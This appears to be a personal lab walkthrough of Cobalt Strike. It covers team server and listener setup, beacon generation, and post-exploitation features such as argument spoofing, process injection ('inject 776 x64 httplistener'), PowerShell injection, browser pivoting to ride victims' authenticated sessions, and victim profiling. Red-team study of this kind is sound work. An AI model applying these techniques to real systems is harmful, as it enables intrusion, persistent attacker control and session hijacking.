Cobalt Strike 101
This lab is for exploring the advanced penetration testing / post-exploitation tool Cobalt Strike.
- Listener - a service running on the attacker's C2 server that is listening for beacon callbacks
- Beacon - a malicious agent / implant on a compromised system that calls back to the attacker controlled system and checks for any new commands that should be executed on the compromised system
- Team server - Cobalt Strike's server component. Team server is where listeners for beacons are configured and stood up.
# the syntax is ./teamserver <serverIP> <password> <~killdate> <~profile>
# ~ optional for now
[email protected]/opt/cobaltstrike# ./teamserver 10.0.0.5 password
Note that in real life red team engagements, you would put the team servers behind redirectors to add resilience to your attacking infrastructure. See Red Team Infrastructure
Enter the following:
- host - team server IP or DNS name
- user - anything you like - it's just a nickname
- password - your team server password
All of the above steps are shown below in one animated gif:
Give your listener a descriptive name and a port number the team server should bind to and listen on:
Generate a stageless (self-contained exe) beacon - choose the listener your payload will connect back to and payload architecture and you are done:
On the left is a victim machine, executing the previously generated beacon - and on the left is a cobalt strike client connected to the teamserver catching the beacon callback:
Right click the beacon and select interact. Note the new tab opening at the bottom of the page that allows an attacker issuing commdands to the beacon:
Argue command allows the attacker to spoof commandline arguments of the process being launched.
The below spoofs calc command line parameters:
Note the differences in commandline parameters captured in sysmon vs procexp:
Argument spoofing is done via manipulating memory structures in Process Environment Block which I have some notes about:
Inject is very similar to metasploit's
migrate function and allows an attacker to duplicate their beacon into another process on the victim system:beacon> help inject
Use: inject [pid] <x86|x64> [listener]
inject 776 x64 httplistener
Note how after injecting the beacon to PID 776, another session is spawned:
Runu allows us launching a new process from a specified parent process:
This function allows an attacker executing powershell scripts from under any process on the victim system. Note that PID 2872 is the calc.exe process seen in the above screenshot related to
runu:
Highlighted in green are new handles that are opened in the target process when powershell script is being injected:
Spawn a session with powershell payload from a given parent PID:
This feature enables an attacker riding on compromised user's browsing sessions.
The way this attack works is best explained with an example:
- Victim log's in to some web application using Internet Explorer.
- Attacker/operator creates a browser pivot by issuing a
browserpivotcommand - The beacon creates a proxy server on the victim system (in Internet Explorer process to be more precise) by binding and listening to a port, say 6605
- Team server binds and starts listening to a port, say 33912
- Attacker can now use their teamserver:33912 as a web proxy. All the traffic that goes through this proxy will be forwarded/traverse the proxy opened on the victim system via the Internet Explorer process (port 6605). Since Internet Explorer relies on WinINet library for managing web requests and authentication, attacker's web requests will be reauthenticated allowing the attacker to view same applications the victim has active sessions to without being asked to login.
Browser pivotting in cobalt strike:
Note how the iexplore.exe opened up port 6605 for listening as mentioned earlier:
The below illustrates the attack visually. On the left - a victim system logged to some application and on the right - attacker id trying to access the same application and gets presented with a login screen since they are not authenticated:
The story changes if the attacker starts proxying his web traffic through the victim proxy
10.0.0.5:33912:
A nice feature that profiles potential victims by gathering information on what software / plugins victim system has installed:
Once the the profilder URL is visited, findings are presented in the Application view:
Event logs will show how many times the profiler has been used by victims:
Last modified 4yr ago